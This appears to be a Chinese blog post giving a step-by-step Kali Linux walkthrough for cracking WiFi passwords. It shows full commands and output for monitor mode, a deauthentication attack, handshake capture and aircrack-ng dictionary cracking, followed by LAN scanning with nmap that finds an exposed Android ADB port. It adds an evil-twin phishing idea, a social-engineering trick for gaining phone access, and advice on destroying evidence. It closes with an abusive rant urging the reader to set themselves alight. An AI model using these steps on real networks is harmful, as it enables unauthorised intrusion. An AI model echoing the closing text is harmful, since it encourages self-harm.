破解wifi密码连接wifi并扫描局域网设备基本流程概述
#linux, #kali, #wifi, #渗透, #破解, #usb无线
将usb网卡插到电脑或者电脑自带pci设备
宿主机检查新增设备usb接口
sudo dmesg | grep -i usb
回显信息
[ 414.042120] usb 8-1.4: New USB device found, idVendor=0e8d, idProduct=7961, bcdDevice= 1.00
宿主机检查usb接口
sudo lsusb | grep -i 0e8d:7961
回显信息
Bus 008 Device 007: ID 0e8d:7961 MediaTek Inc. Wireless_Device
宿主机检查usb接口详细信息
sudo lsusb -s 008:007 -v
回显信息
Bus 008 Device 007: ID 0e8d:7961 MediaTek Inc. Wireless_Device
Device Descriptor:
bLength 18
bDescriptorType 1
bcdUSB 3.20
bDeviceClass 0 [unknown]
bDeviceSubClass 0 [unknown]
bDeviceProtocol 0
bMaxPacketSize0 9
idVendor 0x0e8d MediaTek Inc.
idProduct 0x7961 Wireless_Device
bcdDevice 1.00
iManufacturer 2 MediaTek Inc.
iProduct 3 Wireless_Device
iSerial 4 000000000
bNumConfigurations 1
Configuration Descriptor:
bLength 9
bDescriptorType 2
wTotalLength 0x0087
bNumInterfaces 1
bConfigurationValue 1
iConfiguration 5 Config_01
bmAttributes 0xa0
(Bus Powered)
Remote Wakeup
MaxPower 160mA
Interface Descriptor:
bLength 9
bDescriptorType 4
bInterfaceNumber 0
bAlternateSetting 0
bNumEndpoints 9
bInterfaceClass 255 Vendor Specific Class
bInterfaceSubClass 255 Vendor Specific Subclass
bInterfaceProtocol 255 Vendor Specific Protocol
iInterface 1 WiFi_If
Endpoint Descriptor:
bLength 7
bDescriptorType 5
bEndpointAddress 0x84 EP 4 IN
bmAttributes 2
Transfer Type Bulk
Synch Type None
Usage Type Data
wMaxPacketSize 0x0400 1x 1024 bytes
bInterval 0
bMaxBurst 0
Endpoint Descriptor:
bLength 7
bDescriptorType 5
bEndpointAddress 0x85 EP 5 IN
bmAttributes 2
Transfer Type Bulk
Synch Type None
Usage Type Data
wMaxPacketSize 0x0400 1x 1024 bytes
bInterval 0
bMaxBurst 0
Endpoint Descriptor:
bLength 7
bDescriptorType 5
bEndpointAddress 0x08 EP 8 OUT
bmAttributes 2
Transfer Type Bulk
Synch Type None
Usage Type Data
wMaxPacketSize 0x0400 1x 1024 bytes
bInterval 0
bMaxBurst 0
Endpoint Descriptor:
bLength 7
bDescriptorType 5
bEndpointAddress 0x04 EP 4 OUT
bmAttributes 2
Transfer Type Bulk
Synch Type None
Usage Type Data
wMaxPacketSize 0x0400 1x 1024 bytes
bInterval 0
bMaxBurst 0
Endpoint Descriptor:
bLength 7
bDescriptorType 5
bEndpointAddress 0x05 EP 5 OUT
bmAttributes 2
Transfer Type Bulk
Synch Type None
Usage Type Data
wMaxPacketSize 0x0400 1x 1024 bytes
bInterval 0
bMaxBurst 0
Endpoint Descriptor:
bLength 7
bDescriptorType 5
bEndpointAddress 0x06 EP 6 OUT
bmAttributes 2
Transfer Type Bulk
Synch Type None
Usage Type Data
wMaxPacketSize 0x0400 1x 1024 bytes
bInterval 0
bMaxBurst 0
Endpoint Descriptor:
bLength 7
bDescriptorType 5
bEndpointAddress 0x07 EP 7 OUT
bmAttributes 2
Transfer Type Bulk
Synch Type None
Usage Type Data
wMaxPacketSize 0x0400 1x 1024 bytes
bInterval 0
bMaxBurst 0
Endpoint Descriptor:
bLength 7
bDescriptorType 5
bEndpointAddress 0x09 EP 9 OUT
bmAttributes 2
Transfer Type Bulk
Synch Type None
Usage Type Data
wMaxPacketSize 0x0400 1x 1024 bytes
bInterval 0
bMaxBurst 0
Endpoint Descriptor:
bLength 7
bDescriptorType 5
bEndpointAddress 0x86 EP 6 IN
bmAttributes 3
Transfer Type Interrupt
Synch Type None
Usage Type Data
wMaxPacketSize 0x0002 1x 2 bytes
bInterval 1
bMaxBurst 0
Binary Object Store Descriptor:
bLength 5
bDescriptorType 15
wTotalLength 0x0016
bNumDeviceCaps 2
USB 2.0 Extension Device Capability:
bLength 7
bDescriptorType 16
bDevCapabilityType 2
bmAttributes 0x0000f11e
BESL Link Power Management (LPM) Supported
BESL value 256 us
Deep BESL value 61440 us
SuperSpeed USB Device Capability:
bLength 10
bDescriptorType 16
bDevCapabilityType 3
bmAttributes 0x00
wSpeedsSupported 0x000e
Device can operate at Full Speed (12Mbps)
Device can operate at High Speed (480Mbps)
Device can operate at SuperSpeed (5Gbps)
bFunctionalitySupport 1
Lowest fully-functional device speed is Full Speed (12Mbps)
bU1DevExitLat 10 micro seconds
bU2DevExitLat 180 micro seconds
Device Status: 0x0000
(Bus Powered)
宿主机检查自带pci接口
sudo lspci | grep -i Wireless
回显信息
04:00.0 Network controller: MEDIATEK Corp. MT7922 802.11ax PCI Express Wireless Network Adapter
宿主机查看自带pci接口详细信息
sudo lspci -s 04:00.0 -v
回显信息
04:00.0 Network controller: MEDIATEK Corp. MT7922 802.11ax PCI Express Wireless Network Adapter
Subsystem: MEDIATEK Corp. MT7922 802.11ax PCI Express Wireless Network Adapter
Flags: bus master, fast devsel, latency 0, IRQ 103, IOMMU group 17
Memory at 7ff0300000 (64-bit, prefetchable) [size=1M]
Memory at dc900000 (64-bit, non-prefetchable) [size=32K]
Capabilities: [80] Express Endpoint, MSI 00
Capabilities: [e0] MSI: Enable+ Count=1/32 Maskable+ 64bit+
Capabilities: [f8] Power Management version 3
Capabilities: [100] Vendor Specific Information: ID=1556 Rev=1 Len=008 <?>
Capabilities: [108] Latency Tolerance Reporting
Capabilities: [110] L1 PM Substates
Capabilities: [200] Advanced Error Reporting
Kernel driver in use: mt7921e
Kernel modules: mt7921e
宿主机检查自带pci接口驱动信息
sudo lspci -s 04:00.0 -k
回显信息
04:00.0 Network controller: MEDIATEK Corp. MT7922 802.11ax PCI Express Wireless Network Adapter
Subsystem: MEDIATEK Corp. MT7922 802.11ax PCI Express Wireless Network Adapter
Kernel driver in use: mt7921e
Kernel modules: mt7921e
宿主机检查wlan设备接口
sudo iw dev
回显信息
phy#5
Interface wlx90de80479053
ifindex 63
wdev 0x500000005
addr AA:BB:CC:DD:EE:08
type managed
multicast TXQ:
qsz-byt qsz-pkt flows drops marks overlmt hashcol tx-bytes tx-packets
0 0 0 0 0 0 0 0 0
创建kali容器,绑定宿主机本地usb设备
#docker rm -fv kali-rolling
docker run --restart=always --name kali-rolling \
--platform linux/amd64 \
--privileged \
--network host \
-d \
-e DEBIAN_FRONTEND=noninteractive \
-it \
-v /dev/bus/usb:/dev/bus/usb \
docker.io/kalilinux/kali-rolling:latest bash
# 进入kali容器
docker exec -it kali-rolling bash
# 安装wifi抓包相关工具
apt update
apt install -y aircrack-ng kmod procps usbutils iw wpasupplicant net-tools pciutils locales isc-dhcp-client arp-scan nmap curl
# 确认usb接口
lsusb | grep -i 0e8d:7961
回显信息
Bus 008 Device 007: ID 0e8d:7961 MediaTek Inc. Wireless_Device
确认pci接口
lspci | grep -i Wireless
回显信息
04:00.0 Network controller: MEDIATEK Corp. MT7922 802.11ax PCI Express Wireless Network Adapter
确认usb设备接口
iw dev
回显信息
phy#5
Interface wlx90de80479053
ifindex 61
wdev 0x500000003
addr AA:BB:CC:DD:EE:08
type managed
multicast TXQ:
qsz-byt qsz-pkt flows drops marks overlmt hashcol tx-bytes tx-packets
0 0 0 0 0 0 0 0 0
开启wlan设备监控模式
# 启用usb网卡
ip link set wlx90de80479053 up
# 关闭干扰服务
airmon-ng check kill
# USB 网卡会被识别为 wlx90de80479053,开启监控后会变成 wlan0mon
airmon-ng start wlx90de80479053
回显信息
PHY Interface Driver Chipset
unable to initialize usb specphy5 wlx90de80479053 mt7921u MediaTek Inc. Wireless_Device
Interface wlx90de80479053mon is too long for linux so it will be renamed to the old style (wlan#) name.
(mac80211 monitor mode vif enabled on [phy5]wlan0mon)
(mac80211 station mode vif disabled for [phy5]wlx90de80479053)
扫描所有信号
airodump-ng wlan0mon
回显信息
CH 14 ][ Elapsed: 6 s ][ 2025-08-20 20:48
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
AA:BB:CC:DD:EE:01 -55 4 0 0 9 130 WPA2 CCMP PSK WIFI1
AA:BB:CC:DD:EE:02 -56 9 0 0 8 130 WPA2 CCMP PSK WIFI2
AA:BB:CC:DD:EE:03 -48 4 0 0 1 270 WPA3 CCMP SAE WIFI3
AA:BB:CC:DD:EE:04 -27 4 0 0 1 270 WPA3 CCMP SAE WIFI4
AA:BB:CC:DD:EE:05 -44 10 0 0 1 270 WPA2 CCMP PSK WIFI5
BSSID STATION PWR Rate Lost Frames Notes Probes
AA:BB:CC:DD:EE:03 AA:BB:CC:DD:EE:06 -55 0 -24e 12 7
AA:BB:CC:DD:EE:04 AA:BB:CC:DD:EE:07 -46 0 - 1e 0 1
只监听某个信道/目标 BSSID
airodump-ng --bssid AA:BB:CC:DD:EE:03 -c 1 wlan0mon
注入(断开客户端)触发握手,让客户端重新认证,生成握手包
aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:06 wlan0mon
用字典 (如wordlist.txt)/暴力工具(如 aircrack-ng、Hashcat)进行离线破解
aircrack-ng -w wordlist.txt -b AA:BB:CC:DD:EE:03 capture.cap
USB 网卡开启监控会被改名为 wlan0mon,关闭监控后会还原成 wlx90de80479053
airmon-ng stop wlan0mon
相比用字典碰运气的破解方式,也许可以尝试主动攻击,比如创建同名wifi热点,搭建可认证的登录页面,让知道wifi密码的人连接,并输入真正的明文密码,后台展示密码
这就不是碰运气,而是真正的伪装技术了
#TODO,emm,我不知道怎么做,这段很迷茫,我只是有一个想法,没想好,也不知道怎么做,也许以后再写吧,也许没有以后了
临时连接wifi测试
配置中文字符集
sed -i 's;# zh_CN.UTF-8 UTF-8;zh_CN.UTF-8 UTF-8;g' /etc/locale.gen
locale-gen
update-locale LANG=zh_CN.UTF-8
export LANG=zh_CN.UTF-8
export LC_ALL=zh_CN.UTF-8
locale
# 启用wpa_supplicant服务socks
pkill -f wpa_supplicant
rm -frv /var/run/wpa_supplicant ; sleep 3
wpa_supplicant -B -i wlx90de80479053 -C /var/run/wpa_supplicant
# 扫描wifi
wpa_cli -i wlx90de80479053 scan
# 获取扫描结果
wpa_cli -i wlx90de80479053 scan_results | python3 -c "
import sys
for line in sys.stdin:
line = line.strip()
b = bytearray()
i = 0
while i < len(line):
if line[i:i+2] == '\\\\x' and i+3 < len(line):
b.append(int(line[i+2:i+4], 16))
i += 4
else:
b.append(ord(line[i]))
i += 1
print(b.decode('utf-8'))
"
回显信息如下
bssid / frequency / signal level / flags / ssid
12:76:ec:70:ff:f3 2412 -30 [WPA2-PSK+SAE-CCMP][ESS] 喵喵喵
或者也可以通过这个方式获取结果
iw dev wlx90de80479053 scan | grep 'SSID:' | awk -F'SSID: ' '{print $2}' | python3 -c "
import sys
for line in sys.stdin:
line = line.strip()
b = bytearray()
i = 0
while i < len(line):
if line[i:i+2] == '\\\\x' and i+3 < len(line):
b.append(int(line[i+2:i+4], 16))
i += 4
else:
b.append(ord(line[i]))
i += 1
print(b.decode('utf-8'))
"
回显信息如下
喵喵喵
生成配置(包含 Wi-Fi 密钥)
wpa_passphrase "喵喵喵" "12345678" > /etc/wpa_supplicant/wpa_supplicant-wlx90de80479053.conf
或者你也可以生成更复杂的配置
# 将wifi名转为十六进制(hex)表示
python3 -c 'print("喵喵喵".encode("utf-8").hex())'
得到的十六进制回显信息为
e596b5e596b5e596b5
生成配置(包含 Wi-Fi 密钥)
wpa_passphrase "喵喵喵" "12345678" > /etc/wpa_supplicant/wpa_supplicant-wlx90de80479053.conf
# 将wifi名替换为十六进制,检查替换结果
sed -i 's;"喵喵喵";e596b5e596b5e596b5;g' /etc/wpa_supplicant/wpa_supplicant-wlx90de80479053.conf
cat /etc/wpa_supplicant/wpa_supplicant-wlx90de80479053.conf
# 启动 wpa_supplicant (前台测试用)
pkill -f wpa_supplicant
rm -frv /var/run/wpa_supplicant ; sleep 3
wpa_supplicant -i wlx90de80479053 -c /etc/wpa_supplicant/wpa_supplicant-wlx90de80479053.conf -D nl80211 -B -C /var/run/wpa_supplicant
# 检查连接状态
wpa_cli -i wlx90de80479053 -p /var/run/wpa_supplicant status
回显信息
bssid=AA:BB:CC:DD:EE:09
freq=5805
ssid=喵喵喵
id=0
mode=station
wifi_generation=6
pairwise_cipher=CCMP
group_cipher=CCMP
key_mgmt=WPA2-PSK
wpa_state=COMPLETED
p2p_device_address=AA:BB:CC:DD:EE:08
address=AA:BB:CC:DD:EE:08
uuid=9d955c2b-90ed-50c1-bf63-3f71e06d5bdd
ieee80211ac=1
或者这样检查连接状态
iw dev wlx90de80479053 link
回显信息
Connected to AA:BB:CC:DD:EE:09 (on wlx90de80479053)
SSID: 喵喵喵
freq: 5805.0
RX: 4240 bytes (32 packets)
TX: 797 bytes (7 packets)
signal: -68 dBm
rx bitrate: 24.0 MBit/s
tx bitrate: 720.6 MBit/s 80MHz HE-MCS 7 HE-NSS 2 HE-GI 0 HE-DCM 0
bss flags: short-slot-time
dtim period: 2
beacon int: 100
自动获取更新接口dhcp状态
dhclient -v wlx90de80479053
或者你能力比较强,你知道局域网的详细状态,你可以手搓一个dhcp状态,你要是没能力,老老实实自动获取dhcp
比如你已经探测到局域网 192.168.31.0/24 则有如下配置
ip addr del 192.168.31.2/24 dev wlx90de80479053
ip route del default via 192.168.31.1 dev wlx90de80479053
ip addr add 192.168.31.2/24 dev wlx90de80479053
ip route add default via 192.168.31.1 dev wlx90de80479053
指定接口扫描局域网设备ip
arp-scan -I wlx90de80479053 192.168.31.0/24
回显信息如下
Interface: wlx90de80479053, type: EN10MB, MAC: AA:BB:CC:DD:EE:08, IPv4: 192.168.31.2
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 AA:BB:CC:DD:EE:10 (Unknown)
192.168.31.95 AA:BB:CC:DD:EE:11 (Unknown)
192.168.31.147 AA:BB:CC:DD:EE:12 (Unknown)
192.168.31.165 AA:BB:CC:DD:EE:13 Beijing Xiaomi Mobile Software Co., Ltd
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.898 seconds (134.88 hosts/sec). 4 responded
或者指定接口扫描存活设备ip
nmap -sn -e wlx90de80479053 192.168.31.0/24
回显信息如下
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-21 05:56 UTC
Nmap scan report for 192.168.31.1
Host is up (0.0011s latency).
MAC Address: AA:BB:CC:DD:EE:10 (Unknown)
Nmap scan report for 192.168.31.95
Host is up (0.11s latency).
MAC Address: AA:BB:CC:DD:EE:11 (Unknown)
Nmap scan report for 192.168.31.147
Host is up (0.19s latency).
MAC Address: AA:BB:CC:DD:EE:12 (Unknown)
Nmap scan report for 192.168.31.165
Host is up (0.0083s latency).
MAC Address: AA:BB:CC:DD:EE:13 (Beijing Xiaomi Mobile Software)
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.96 seconds
检查某一设备开放了什么端口服务,当然这是我自己手机开的端口服务,开放 5555 端口的 Android 设备存在安全风险,建议只在可信网络中开启。
根据扫描结果,192.168.31.147 是一台 Android 设备,开放了 5555 端口,运行 ADB 服务(需要 token 验证才能连接)
-O 是尝试识别操作系统,-sV 是探测服务版本
当然社会工程学的意义就在于此,你知道这个人你也知道这个人的设备,你可以说:“我想借用你的电话可以吗?然后开启无线adb授权,这样你大概率就拥有了手机的使用权”。
nmap -sV -p 1-65535 -e wlx90de80479053 192.168.31.147
回显信息如下
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-21 06:03 UTC
Nmap scan report for 192.168.31.147
Host is up (0.012s latency).
Not shown: 9998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge (token auth required)
MAC Address: AA:BB:CC:DD:EE:12 (Unknown)
Service Info: OS: Android; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.03 seconds
什么?怕被发现,没事,删掉容器,设备一扔,指纹一擦,潇洒离场,太刑了
docker rm -fv kali-rolling
什么?!你想获取某某平台后台权限?我想说,这一切都毫无意义,你没有域名、服务器和肉鸡,你甚至都不能用C语言编写一款兼容各个系统的植入程序实施洪流攻击
你甚至都没钱没本事去实验,学这些理论的技术,不去使用只是一味意淫,活在自以为是的错觉中,你什么都没有,你!是个垃圾
任何一个平台都可以骑在你的头上拉屎,那些平台手举伪善的大旗,带着一群脑瘫活在一个自以为是的美好世界,每个人自诩天选之子夜夜笙歌
任何一个平台它可以拥有你的一切,你的隐私、文档、数据和行为习惯,而平台掌权者却是个自以为是的混蛋,你卑微的去找他们理论寻求一个道歉,你说了这不是你的意思,这不公平
到最后那帮脑瘫和掌权者它们谩骂你嘲笑你,论述着你的抽象,给你贴上”负能量“,说你自私,说你应该感恩戴德,把你贬得一文不值,掌权者时刻拿着你的信息威胁你,随时准备在自己的社区批斗你的任何信息,还说着让大家看看
随时有脑瘫追随者说着定位你啦,要开盒你啦,要搞你啦,你要完蛋啦,你的人生都要葬在这里啦,而你只是想要掌权者和欺负你的人的一个道歉,却永远也做不到,最后你像一条失落的老狗一样离开了
你甚至都没有力气,没有精力,你再也不想看到它们,你觉得恶心,你觉得烦躁,那些脑瘫就像无头苍蝇一样给你打电话、发短信、加QQ、加微信和发邮件等等等等
发着污秽不堪的文字,威胁着你,伤害着你,恶心着你,它们为了把你逼疯,甚至随时把你从一个又一个群,一个又一个社区谩骂逼走,举报着你的账号让你无法在说话,就像是清扫“杂质”一样
你无可奈何,无力喘息,就好像你是非人类的生命形态,游走在这个世界,你想跟它们理论,它们笑着骂你是个傻逼,又补充说道:“理论个屁!”
你觉得你所拥有的一切都变得不再美好,因为你!是个垃圾,你为什么不够强大,强大到没人可以对你造成伤害,强大到没人可以对你的人生指指点点,强大到它们欺负你就可以随时准备让那些畜生草长一米高
你为什么不够强大,为什么?因为你!是个垃圾,你将耗费你大量的人生,去消化那些记忆,你的后半生也不断活在痛苦与悔恨中,你不断的想不断的想这些事,其它人都在忙着赚钱,忙着生活,忙着夜夜笙歌
而你活在自己那本不宽敞的世界里,那些思想就像垃圾一样充满着填满着你的思想世界,进一步让你的世界变得狭隘
其它人都已经儿孙满堂,当了爷爷奶奶,而你还在想还在想
它们的孩子都已经开始在接受着霸凌和霸凌者其它人的时候,而你还在想你还在想
人类都逃到火星上去了,没人记得你了,而你还在想还在想
世界已经毁灭了,人类都灭绝了,而你还在想你还在想
你只是想要一个道歉,你做错了什么,也许,你错在,在错误的时间,遇到了错误的人,错误的事,错误的经历,这一切都是个错误,打从一开始你就不应该出现,人类也是如此
最后你和一个又一个拾荒老人一样,在街头捡着纸壳踩着易拉罐,冬天蜷缩在纸壳中,夏天用纸壳挡光,变卖着废品,嘴里骂着垃圾和自己的回忆,最后一个人消失在这个垃圾一般的世界
终于一切都结束了,什么都不重要了,所有人都老了死了结束了,太好了!反正人是可燃烧生命,你不如把自己点了,下十八层地狱去,那里没有你讨厌的人讨厌的事,那里什么都没有,因为那里是!地狱。
你应该知道我说的不是“你”,对吧?
Comments
Post a Comment